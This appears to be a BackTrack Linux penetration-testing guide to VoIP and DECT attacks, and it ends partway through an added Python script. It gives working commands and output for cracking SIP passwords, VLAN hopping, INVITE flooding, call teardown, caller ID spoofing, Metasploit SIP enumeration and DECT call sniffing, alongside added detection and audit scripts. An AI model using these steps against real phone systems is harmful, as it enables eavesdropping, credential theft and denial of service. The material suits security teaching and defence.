Although Xplico is not in the BackTrack VoIP tools directory, it is a very useful tool for capturing SIP and RTP traffic (among other protocols). Xplico can be found in the Backtrack -> Digital Forensics -> Forensic Analysis menu.
In case it is not present on your Backtrack installation you can simply install it by issuing the following command:
root@bt:~# apt-get install xplico
Xplico can be used to capture live traffic or to import a Wireshark PCAP capture file. Either way, Xplico will decode the captured packets and assemble them into the appropriate format; in our case it will be SIP and RTP. After executing Xplico you will be asked to log in; the default username and password are both xplico.
We will be asked to choose between a live capture and importing a PCAP file. In this example we will use Xplico to perform a live capture (we will ARP poison our targets in the background using arpspoof). Next we will have to choose our case and create a new session.
By choosing our newly created session we will see our main statistics page with the option to choose our network adapter and start/stop the capture process.
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txt
SIPdump 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
* Using dev 'eth0' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')

root@bt:/pentest/voip/sipcrack# ./sipdump -p /root/registration.pcap auth.txt
SIPdump 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
* Using pcap file '/root/registration.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.101 (User: '200')
* Exiting, sniffed 1 logins
SIPDump will write the authentication challenge response to the specified file which looks as follows:
Attacking Authentication
SIP can be susceptible to 2 types of authentication attacks. Before we take a look at these attack types, let's understand how SIP registration and authentication take place. SIP uses digest authentication, the same mechanism the HTTP protocol uses, known as HTTP digest. Because SIP is an ASCII-based protocol, the authentication details are hashed so that they are not transported in clear text. When a SIP client (user agent) wants to authenticate with a SIP server, the server generates and sends a digest challenge to the client; it contains the following parameters:
Realm - used to identify credentials within a SIP message; usually it is the SIP domain.
Nonce - a unique MD5 string generated by the server for each registration request. It is made from a time stamp and a secret phrase to ensure it has a limited lifetime and cannot be used again.
Once the client receives the digest challenge and the user enters his credentials, the client uses the nonce to generate a digest response and sends it back to the server.
With that said, let's try to crack the digest response in order to obtain a valid SIP account password.
SIPCrack Usage:
root@bt:/pentest/voip/sipcrack# ./sipcrack
SIPcrack 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
Usage: sipcrack [OPTIONS] [ -s | -w ]
  = file containing logins sniffed by SIPdump
Options:
  -s = use stdin for passwords
  -w = file containing all passwords
  = print cracking process every n (ATTENTION: slows down
  -w or -s has to be given
Dictionary attack
Backtrack provides some basic dictionaries which are located in:
root@bt:/pentest/passwords/wordlists
But for the purpose of this article I will use another great tool in BackTrack called Crunch, which is used to create custom dictionaries. Let's use Crunch to create a six-character numeric dictionary. Crunch is located in:
root@bt:/pentest/passwords/crunch#
Crunch Usage:
usage: crunch [-f /path/to/charset.lst charsetname] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txt
Crunch will now generate 7000000 bytes of data
Crunch will now generate 6 MB of data
Crunch will now generate 0 GB of data
100%
We will use the previously captured SIP credentials stored by SIPDump in the auth.txt file, and sipass.txt (which we created using Crunch) as the dictionary. Cracking the digest response:
root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txt
SIPcrack 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
* Found Accounts:
Num Server        Client        User Hash|Password
1   192.168.1.101 192.168.1.104 200  3a33e768ed6f630347f4b511371926bd
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Loaded wordlist: 'sipass.txt'
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Tried 123457 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done
Generating passwords using john and redirecting the output to our FIFO file, for this example we will generate up to 6 digits only.
root@bt:~# john
[*] This script will take you to /pentest/passwords/jtr/
[*] From there, run ./john
root@bt:/pentest/passwords/jtr# ./john -incremental=digits -stdout=6 > /tmp/sipcrack
root@bt:/pentest/voip/sipcrack# ./sipcrack -w /tmp/sipcrack auth.txt
SIPcrack 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
* Found Accounts:
Num Server        Client        User Hash|Password
1   192.168.1.111 192.168.1.104 200  8edc2d549294f6535070439fb069c968
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Loaded wordlist: '/tmp/sipcrack'
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Tried 3 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done
root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -r100000-999999 192.168.1.104
| Extension | Password |
------------------------
| 200       | 123456   |
VLAN Hopping
Usually VoIP traffic is carried on a dedicated VLAN (Virtual LAN), as we saw in the topologies section. This means that we cannot intercept the VoIP traffic by sniffing and ARP poisoning alone. The reason is that a VLAN is like a separate network: it has its own broadcast domain and a different IP range than the data network. VLAN hopping is a way to hop to another VLAN, and luckily for us BackTrack includes the necessary tools to perform this attack. One common topology is where the IP phone has a built-in internal switch: the PC is plugged into the phone's PC socket and the phone is connected from its LAN/SW socket to the network switch, as follows:
A typical CISCO switch port configuration for VoIP will look something like:
Switch# conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#interface fastEthernet 0/1
Switch(config-if)#switchport mode access
Switch(config-if)#switchport access vlan 10
Switch(config-if)#switchport voice vlan 20
The IP phone will be configured with the appropriate voice VLAN ID (20) and the PC data traffic will flow through VLAN 10. Before we begin hopping around we will have to enable support for the 802.1Q protocol in BackTrack by typing:
VoIP Hopper
VoIP Hopper is used to hop into the voice VLAN by behaving like an IP phone; it supports specific switches and some IP phone models, currently from the brands Cisco, Avaya and Nortel. VoIP Hopper was designed to run under BackTrack Linux and currently has the following features: DHCP client, CDP generator, MAC address spoofing and VLAN hopping. VoIP Hopper usage:
root@bt:/pentest/voip/voiphopper# ./voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
Example: voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
-D (Device ID) -P (Port ID) -C (Capabilities) -L (Platform) -S (Software) -U (Duplex)
Example: voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
Example: voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
Example: voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
Example: voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
Example: voiphopper -i eth0 -n
VoIP Hopper provides many attack modes; use the -h option for detailed information.
Let's take a look at an example of sniffing for CDP and running a VLAN hop into the voice VLAN in a Cisco environment. Run VoIP Hopper on the Ethernet interface in the following way:
VoIP Hopper also allows one to VLAN hop to an arbitrary VLAN without sniffing for CDP. If you already know the voice VLAN ID, or would like to VLAN hop into another VLAN, just specify the VLAN ID:
root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~
Trying to hop into VLAN 2
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20
eth0.20 Link encap:Ethernet HWaddr 00:0c:29:84:98:b2
inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:2274 (2.2 KB)
ACE
ACE is another tool for VLAN hopping, very similar to VoIP Hopper in usage, and it also includes an option to discover TFTP (configuration) servers. ACE usage:
root@bt:/pentest/voip/ace# ./ace
ACE v1.0: Automated Corporate (Data) Enumerator
Usage: ace [-i interface] [ -m mac address ] [ -t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode ]
-i <interface> (Mandatory) Interface for sniffing/sending packets
-m <mac address> (Mandatory) MAC address of the victim IP phone
-t <tftp server ip> (Optional) tftp server ip address
-c <cdp mode 0|1 > (Optional) 0 CDP sniff mode, 1 CDP spoof mode
-v <voice vlan id> (Optional) Enter the voice vlan ID
-r <vlan interface> (Optional) Removes the VLAN interface
-d (Optional) Verbose | debug mode
You can add a VLAN hop manually or use its discovery feature:
Mode to auto-discover voice vlan ID in the listening mode for CDP
Example: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E
Mode to auto-discover voice vlan ID in the spoofing mode for CDP
Example: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E
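The switch port configuration shown at the start of this section is exactly what VoIP Hopper and ACE rely on: a voice VLAN assigned on an access port with nothing tying that VLAN to a real phone. From the defender's side, the quick check is to audit the running configuration for voice-VLAN ports that lack any port-level admission control. The script below is an added example for this page (it is not BackTrack, VoIP Hopper or ACE code); it parses Cisco IOS "show running-config" syntax, treats "switchport port-security" and 802.1X ("authentication port-control auto" or "dot1x port-control auto") as the controls worth looking for (an assumption about your policy, not a complete hardening list), and runs on a constructed sample config that includes the page's FastEthernet0/1 port.

```python
"""Audit a Cisco IOS-style switch configuration for access ports that carry a
voice VLAN without port-security or 802.1X.

Added example for this page, not BackTrack / VoIP Hopper / ACE code. The
control names checked for are an assumption about what counts as "hardened";
SAMPLE_CONFIG is constructed for illustration.
"""
import re
from typing import Dict, List

# Constructed sample: the page's voice-VLAN port (0/1), a hardened variant (0/2)
# and a data-only port (0/3) that carries no voice VLAN at all.
SAMPLE_CONFIG = """\
!
interface FastEthernet0/1
 switchport mode access
 switchport access vlan 10
 switchport voice vlan 20
!
interface FastEthernet0/2
 switchport mode access
 switchport access vlan 10
 switchport voice vlan 20
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation restrict
 authentication host-mode multi-domain
 authentication port-control auto
 dot1x pae authenticator
!
interface FastEthernet0/3
 switchport mode access
 switchport access vlan 10
!
"""

VOICE_VLAN = re.compile(r"^switchport voice vlan (\d+)$")

# Name -> predicate over an interface's sub-commands (assumed policy).
CONTROLS = {
    "port-security": lambda cmds: "switchport port-security" in cmds,
    "802.1x": lambda cmds: ("authentication port-control auto" in cmds
                            or "dot1x port-control auto" in cmds),
}


def parse_interfaces(config: str) -> Dict[str, List[str]]:
    """Return {interface name: [indented sub-commands]} from IOS config text."""
    interfaces: Dict[str, List[str]] = {}
    current = None
    for raw in config.splitlines():
        if raw.startswith("interface "):
            current = raw[len("interface "):].strip()
            interfaces[current] = []
        elif raw.startswith(" ") and current is not None:
            interfaces[current].append(raw.strip())
        else:
            current = None  # '!' or any top-level line closes the block
    return interfaces


def audit_voice_ports(config: str) -> Dict[str, Dict[str, object]]:
    """For every port with a voice VLAN, report the VLAN id and the controls it lacks."""
    findings: Dict[str, Dict[str, object]] = {}
    for name, cmds in parse_interfaces(config).items():
        vlan = None
        for cmd in cmds:
            match = VOICE_VLAN.match(cmd)
            if match:
                vlan = int(match.group(1))
        if vlan is None:
            continue  # data-only port, nothing to hop into
        missing = [ctl for ctl, present in CONTROLS.items() if not present(cmds)]
        findings[name] = {"voice_vlan": vlan, "missing": missing}
    return findings


if __name__ == "__main__":
    for port, finding in audit_voice_ports(SAMPLE_CONFIG).items():
        status = "OK" if not finding["missing"] else "REVIEW, missing " + ", ".join(finding["missing"])
        print(f"{port}: voice VLAN {finding['voice_vlan']} -> {status}")
```

Feed it the output of "show running-config" from a real switch and every port listed under REVIEW is one where a host plugged into the phone's PC socket can claim the voice VLAN with nothing more than a CDP or DHCP exchange.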
It doesn't matter whether you used VoIP Hopper or ACE: you can now intercept VoIP traffic with tools like UCSniff by specifying your newly created interface. For example:
Denial Of Service
A denial of service attack on VoIP services can render them useless by intentionally damaging the availability of the network and the VoIP systems. This attack can occur on two levels: standard network DoS attacks and VoIP-specific DoS attacks. Generally we will either flood the network with huge amounts of data to consume all of its resources, or target a specific protocol in order to overwhelm it with requests. Let's take a quick overview of the tools available in BackTrack.
Inviteflood
This tool can be used to flood a target with INVITE requests; it can be used against SIP gateways/proxies and SIP phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory
interface (e.g. eth0)
target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
target domain (e.g. enterprise.com or an IPv4 address)
IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S srcPort (0 - 65535) [default is wellknown discard port 9]
-D destPort (0 - 65535) [default is wellknown SIP port 5060]
-l lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode
As long as the tool keeps flooding the SIP gateway it will prevent users from making phone calls. You can flood the SIP proxy with a non-existent extension, making it generate a 404 Not Found for every request, just to keep it busy.
Rtpflood
Rtpflood is used to flood a target IP phone with UDP packets containing RTP data. In order to launch a successful attack using rtpflood you will need to know the RTP listening port on the remote device you want to
Iaxflood
IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets
Teardown
Teardown is used to terminate a call by sending a BYE request:
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag
First you will need to capture a valid SIP 200 OK response and use its From and To tags together with its Call-ID value.
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0
Spoofing Caller ID
There are several methods for spoofing Caller ID which we won't discuss here, because they require a different set of tools and equipment that are irrelevant to this article's purpose. Spoofing Caller ID in SIP is fairly easy: you just need to change the From header of the SIP INVITE request.
INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
Contact: <sip:127.0.0.1>
We will take a look at a tool we have already discussed, Inviteflood, which can be used to send spoofed INVITE requests.
Auxiliaries
scanner/sip/enumerator - SIP Username Enumerator (UDP)
scanner/sip/enumerator_tcp - SIP Username Enumerator (TCP)
scanner/sip/options - SIP Endpoint Scanner (UDP)
scanner/sip/options_tcp - SIP Endpoint Scanner (TCP)
voip/sip_invite_spoof - SIP Invite Spoof
Exploits
windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq - SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
unix/webapp/trixbox_langchoice - Trixbox langChoice PHP Local File Inclusion
RPORT 5060 yes The target port
THREADS 1 yes The number of concurrent threads
TO nobody no The destination username to probe at each host
msf auxiliary(options) > set RHOSTS 192.168.1.130/24
RHOSTS => 192.168.1.130/24
msf auxiliary(options) > run
[*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf > use scanner/sip/enumerator
msf auxiliary(enumerator) > show options
Module options (auxiliary/scanner/sip/enumerator):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
CPORT 5060 no The local client port
MAXEXT 9999 yes Ending extension
METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER
MINEXT 0 yes Starting extension
PADLEN 4 yes Cero padding maximum length
RHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port
THREADS 1 yes The number of concurrent threads
Example Usage:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(enumerator) > set MINEXT 100
MINEXT => 100
msf auxiliary(enumerator) > set MAXEXT 500
MAXEXT => 500
msf auxiliary(enumerator) > set PADLEN 3
PADLEN => 3
msf auxiliary(enumerator) > run
[*] Found user: 200 <sip:200@192.168.1.104> [Auth]
[*] Found user: 201 <sip:201@192.168.1.104> [Auth]
[*] Found user: 202 <sip:202@192.168.1.104> [Auth]
[*] Found user: 203 <sip:203@192.168.1.104> [Auth]
[*] Found user: 204 <sip:204@192.168.1.104> [Auth]
[*] Found user: 300 <sip:300@192.168.1.104> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Example Usage:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.104
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
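Each of the SIP attacks covered above (the INVITE flood, the BYE-based teardown, and the REGISTER extension sweep the enumerator module performs) leaves a distinctive pattern in the signalling that a PBX or a monitoring probe can pick up. The script below is an added example for this page, not BackTrack or Metasploit code: it parses raw RFC 3261 messages with a minimal header parser, records dialogs confirmed by a 200 OK (Call-ID plus the From/To tag pair, as in the 200 OK shown in the Teardown section), and raises an alert for a BYE that references no known dialog, for more than a threshold of INVITEs from one source within one second, and for one source REGISTERing against many distinct extensions. The thresholds, the one-second window and all sample messages are constructed assumptions for illustration.

```python
"""Flag three SIP abuse patterns from a stream of captured SIP messages:
INVITE floods (inviteflood), extension sweeps (scanner/sip/enumerator) and
BYE requests for dialogs the PBX never established (teardown).

Added example, not BackTrack or Metasploit code. Assumptions: messages are
plain RFC 3261 text, the thresholds and one-second window are illustrative,
and every message below is a constructed sample.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

TAG_RE = re.compile(r";tag=([^;\s]+)")
USER_RE = re.compile(r"sip:([^@>;]+)@")


def parse_sip(raw: str) -> Dict[str, str]:
    """Return the start-line fields plus a lower-cased header map."""
    lines = raw.strip().splitlines()
    parts = lines[0].split()
    if parts[0].startswith("SIP/"):            # status line, e.g. SIP/2.0 200 OK
        msg = {"method": "RESPONSE", "status": parts[1]}
    else:                                      # request line, e.g. INVITE sip:... SIP/2.0
        msg = {"method": parts[0], "uri": parts[1]}
    for line in lines[1:]:
        if not line.strip():
            break                              # blank line ends the headers
        name, _, value = line.partition(":")
        msg[name.strip().lower()] = value.strip()
    return msg


def dialog_key(msg: Dict[str, str]):
    """Call-ID plus the unordered From/To tag pair identifies a dialog, whichever
    side sends the request (From and To swap when the callee sends the BYE)."""
    tags = TAG_RE.findall(msg.get("from", "")) + TAG_RE.findall(msg.get("to", ""))
    return (msg.get("call-id", ""), frozenset(tags))


def analyse(events: List[Tuple[float, str, str]], invite_per_sec: int = 5,
            sweep_users: int = 5) -> List[Tuple[str, str, str]]:
    """events = [(timestamp, source ip, raw SIP message)] -> [(kind, src, detail)]."""
    alerts: List[Tuple[str, str, str]] = []
    invites = defaultdict(int)       # (src, whole second) -> INVITE count
    probed = defaultdict(set)        # src -> distinct extensions named in REGISTER To:
    established = set()              # dialogs confirmed by a 200 OK
    for ts, src, raw in events:
        msg = parse_sip(raw)
        if msg["method"] == "RESPONSE" and msg.get("status") == "200":
            established.add(dialog_key(msg))
        elif msg["method"] == "INVITE":
            invites[(src, int(ts))] += 1
        elif msg["method"] == "REGISTER":
            user = USER_RE.search(msg.get("to", ""))
            if user:
                probed[src].add(user.group(1))
        elif msg["method"] == "BYE" and dialog_key(msg) not in established:
            alerts.append(("spoofed_bye", src, f"BYE for unknown dialog {msg.get('call-id')}"))
    for (src, sec), n in invites.items():
        if n > invite_per_sec:
            alerts.append(("invite_flood", src, f"{n} INVITEs in second {sec}"))
    for src, users in probed.items():
        if len(users) >= sweep_users:
            alerts.append(("register_sweep", src, f"{len(users)} distinct extensions probed"))
    return alerts


# --- constructed sample traffic (RFC 5737 documentation addresses) -------------
def _request(method: str, user: str, call_id: str, from_tag: str, to_tag: str = "") -> str:
    to_hdr = f"<sip:{user}@192.0.2.5>" + (f";tag={to_tag}" if to_tag else "")
    return (f"{method} sip:{user}@192.0.2.5 SIP/2.0\n"
            f"From: <sip:1000@192.0.2.5>;tag={from_tag}\nTo: {to_hdr}\n"
            f"Call-ID: {call_id}\nCSeq: 1 {method}\nContent-Length: 0\n")


OK_RESPONSE = ("SIP/2.0 200 OK\nFrom: <sip:1000@192.0.2.5>;tag=f1\n"
               "To: <sip:200@192.0.2.5>;tag=t1\nCall-ID: call-1\nCSeq: 1 INVITE\n"
               "Content-Length: 0\n")

EVENTS = [
    (0.0, "192.0.2.5", OK_RESPONSE),                                     # dialog call-1 established
    (1.0, "192.0.2.9", _request("BYE", "200", "call-1", "f1", "t1")),    # legitimate hang-up
    (1.5, "192.0.2.10", _request("BYE", "200", "call-1", "f1", "zzz")),  # tags do not match
] + [
    (2.0 + i / 10, "192.0.2.10", _request("INVITE", "9999", f"flood-{i}", f"x{i}"))
    for i in range(6)                                                    # 6 INVITEs in one second
] + [
    (3.0 + i / 10, "192.0.2.20", _request("REGISTER", str(100 + i), f"reg-{i}", f"r{i}"))
    for i in range(5)                                                    # sweep of extensions 100-104
]

if __name__ == "__main__":
    for kind, src, detail in analyse(EVENTS):
        print(f"{kind:15} {src:12} {detail}")
```

In production the same logic sits behind a packet capture or the PBX's own SIP log, and the thresholds are tuned against a baseline of normal call volume; the dialog check is the part worth keeping strict, since a BYE that matches no 200 OK the PBX has seen has no legitimate origin.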
Closing Words
I hope you've found this document informative; please keep in mind that BackTrack Linux provides many tools and features we haven't covered here. Take the time to browse the tools and read the manuals and READMEs; I am sure you'll find the right tool for the job. Feel free to discuss the tools and methods mentioned here in the BackTrack Linux Forums, we would love to hear your feedback, ideas and experiences. http://www.backtrack-linux.org/forums/
References
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/
What is DECT?
http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications
The problem?
Most vendors don't implement encryption in their devices, so one can sniff the traffic with certain hardware and software. For a previous post on the topic, check: http://www.offensivesecurity.com/backtrack/sniffing-dect-phones-the-details/
Tested on
Original Dosch&Amand Type II PCMCIA Card
SIEMENS C1 DECT Phones set up in repeater mode
NOTE: This is experimental software which is not very actively supported anymore!
Installing dedected
In order to get dedected installed on BackTrack, you have the choice between:
1. Use dedected from the BackTrack 5 repositories.
2. Compile it on your own if you want to experiment.
If you did not insert your Dosch&Amand Type 2 or Type 3 or Voo:doo PCMCIA card, do so now! Next, we load the driver:
If you need info on the usage, type "help". If you live in the U.S., switch to the US/DECT 6 band via the "band" command. Let's enable some verbosity:
verb
After scanning 2-3 times through all channels, disable verbosity and stop scanning:
verb
stop
callscan
Now grab your DECT handset, make a test phone call and wait until you see the call. It is also sufficient if you just get a dialing tone. You should see something like:
### found new call on 00 82 31 33 73 on channel 7 RSSI 34
stop
Ignore every other phone except yours via the following command. IMPORTANT!
ignore 01 30 95 13 37
Now grab your DECT telephony handset and make a test call. I recommend calling a time-telling service that can be reached over a normal phone number. You should get something like this:
### ### ### ### ### ### ###
starting autorec
stopping DIP
starting callscan
trying to sync on 00 82 ab b0 29
got sync
dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
stopping DIP
stop
File -> Import -> Audio, or simply Ctrl+Shift+I. Import the files ending in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav. Play your phone call with the play button:
Hint: if you can only hear noise, your phone seems to use some encoding/encryption. You can enable repeater mode on your telephone so that it disables encryption, and then test whether your setup is working properly.
Clean up / Reload
If you need to reload the drivers:
root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make reload
DECT protocol
If you are interested in more details of the protocol you can open the .pcap file in Wireshark:
Forensics Boot
Since BackTrack 4, and now BackTrack 5, you may have noticed that BackTrack has a boot option called BackTrack Forensics, but what exactly is that?
For a long time now, Linux live CDs have been very useful for forensic acquisition in cases where, for one reason or another, you can't use a hardware write blocker. When configured not to automount drives, and with a little know-how, a Linux live CD can be a fine software write blocker. For a live CD to be considered for this purpose, however, it is of the utmost importance that using it does not alter any data in any way. That is the main reason BackTrack was ruled out in the past: BackTrack would automount available drives and use swap partitions where available, and by doing so it could have caused all sorts of havoc, changing last mount times, altering data on disk, and so on. Since BackTrack 4, and now BackTrack 5, that is no longer the case.
How?
So, let's have the scoop. Forensics people are often detail-oriented and very conservative, so how do we know it is safe to use? Well, first off, the BackTrack 5 live CD is based on Casper and contains no filesystem automount scripts at all. The system initialization scripts have been altered in the forensic boot mode so that BackTrack 5 will not look for or make use of any swap partitions present on the system; all those scripts have been removed.
Verification:
To test this functionality we tried the boot mode with multiple hardware configurations. For each test we took a before MD5 snapshot of the system disks, booted BackTrack 5 in forensic boot mode, verified that no file systems were mounted and swap was not in use, performed a number of activities on the system, then shut it down and took an after MD5 snapshot. In every case the two MD5 snapshots matched, demonstrating that no changes had been made to the disks.
Usage:
When you use BackTrack for forensic purposes, be sure you don't let it go through an unattended boot. The default boot for BackTrack is the standard boot mode, which will use swap partitions if they are present. There is a nice long delay, however, so you will have plenty of time to select the proper boot mode. Also, please remember that this is a Linux distribution: it is highly suggested that you become familiar with Linux before using this, or any other Linux live CD, for any forensic purpose. Finally, be sure to check out the additional forensic tools added to BackTrack 5. We have concentrated on adding imaging and triage tools, but if you find that one of your favourite utilities is missing, please let us know so we can look into having it added.
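The verification procedure described above (hash the disks before, confirm nothing is mounted or swapped, work, hash again) is easy to reproduce for your own hardware. The script below is an added example for this page, not BackTrack code: it streams a device or image through a hash (MD5 to match the page's snapshots; sha256 is the better choice today), checks /proc/mounts and /proc/swaps for the evidence device or any of its partitions, and compares the after-session hash with the before-session one. The /proc samples are constructed, and the demo uses a temporary file in place of a real block device such as /dev/sdb, which you would need to run as root to read.

```python
"""Small-scale version of the forensic boot verification: hash an evidence
device before and after a session and confirm it is neither mounted nor used
as swap in between.

Added example, not BackTrack code. It assumes the /proc/mounts and /proc/swaps
text formats; the /proc samples below are constructed and the demo hashes a
temporary file standing in for a real block device such as /dev/sdb.
"""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple


def hash_device(path: str, algorithm: str = "md5", chunk: int = 1 << 20) -> str:
    """Stream the whole device (or image file) through a hash in 1 MiB blocks."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def device_in_use(device: str, mounts_text: str, swaps_text: str) -> List[str]:
    """Return every /proc/mounts or /proc/swaps line whose first field is the
    device or one of its partitions (e.g. /dev/sdb1 for /dev/sdb)."""
    hits = []
    for line in mounts_text.splitlines() + swaps_text.splitlines():
        fields = line.split()
        if fields and fields[0].startswith(device):
            hits.append(line)
    return hits


def read_proc_state() -> Tuple[str, str]:
    """Live /proc/mounts and /proc/swaps contents on a Linux host (empty elsewhere)."""
    contents = []
    for name in ("/proc/mounts", "/proc/swaps"):
        try:
            with open(name) as fh:
                contents.append(fh.read())
        except OSError:
            contents.append("")
    return contents[0], contents[1]


def verify_session(device: str, before_hash: str,
                   mounts_text: str, swaps_text: str) -> Dict[str, object]:
    """Re-hash the device and report whether it changed and whether the OS touched it."""
    return {"unchanged": hash_device(device) == before_hash,
            "in_use": device_in_use(device, mounts_text, swaps_text)}


# Constructed /proc samples: a host that automounted the evidence disk's first
# partition and took its second as swap, and a clean forensic-mode host.
DIRTY_MOUNTS = "/dev/sda1 / ext4 rw,relatime 0 0\n/dev/sdb1 /media/disk ext3 rw 0 0\n"
DIRTY_SWAPS = ("Filename\t\t\t\tType\t\tSize\tUsed\tPriority\n"
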